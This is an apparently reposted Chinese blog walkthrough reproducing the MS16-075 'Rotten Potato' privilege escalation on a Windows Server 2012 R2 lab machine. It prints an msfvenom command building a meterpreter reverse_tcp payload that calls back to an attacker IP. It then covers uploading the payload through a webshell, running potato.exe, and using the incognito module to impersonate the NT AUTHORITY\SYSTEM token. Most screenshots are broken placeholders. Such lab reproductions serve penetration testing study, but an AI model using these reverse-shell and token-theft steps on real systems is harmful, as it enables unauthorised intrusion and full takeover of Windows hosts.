当前位置: 首页 > article >正文

MS16-075(烂土豆)

烂土豆提取

所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别

复现

上线webshell靶机为windows server 2012 r2
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

使用msf生成木马,利用蚁剑上传至靶机
生成木马shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.128 LPORT=4444 -f exe > shell.exe

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

msf设置监听,利用蚁剑执行shell.exe
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

执行成功,查看当前权限,为Administrator
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

将potato.exe上传
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

开始提权
执行potato.exeexecute -cH -f ./potato.exe
利用模块use incognito
列出令牌list_tokens -u
令牌窃取impersonate_token "NT AUTHORITY\\SYSTEM"
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

提权成功
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传


http://www.kler.cn/a/407647.html

相关文章:

  • 大语言模型---梯度的简单介绍;梯度的定义;梯度计算的方法
  • C#语言入门
  • 赛氪媒体支持“2024科普中国青年之星创作交流活动”医学专场落幕
  • 鸿蒙操作系统(HarmonyOS)开发的初学者了解和入门
  • 介绍一下strset(arr,ch);(c基础)
  • springboot3如何集成knife4j 4.x版本及如何进行API注解
  • Selenium+Java(19):使用IDEA的Selenium插件辅助超快速编写Pages
  • Windows11笔记本装windows10
  • PCA9685的配置学习
  • 计算机网络期末试题及答案(整理)
  • 聚焦AI存储,联想凌拓全力奔赴
  • Mysql的事务隔离机制及其脏读、不可重复读、幻读
  • Jvm知识点
  • 09 —— Webpack搭建开发环境
  • web-03
  • 【数据结构-表达式解析】【hard】力扣224. 基本计算器
  • python中的map、split、join函数的作用 => ACM输入输出流
  • 机器翻译 数据集 (NLP基础 - 预处理 → tokenize → 词表 → 截断/填充 → 迭代器) + 代码实现 —— 笔记3.9《动手学深度学习》
  • 从零开始配置Qt+VsCode环境
  • 图的邻接矩阵和邻接表存储
  • 常见协议及其功能
  • c++ chrono 时间统计
  • 11.22 日校内模拟赛总结 + 题解(矩阵加速dp, 分块)
  • 【论文速读】| RobustKV:通过键值对驱逐防御大语言模型免受越狱攻击
  • vue3中如何上传文件到腾讯云的桶(cosbrowser)
  • zotero7 插件使用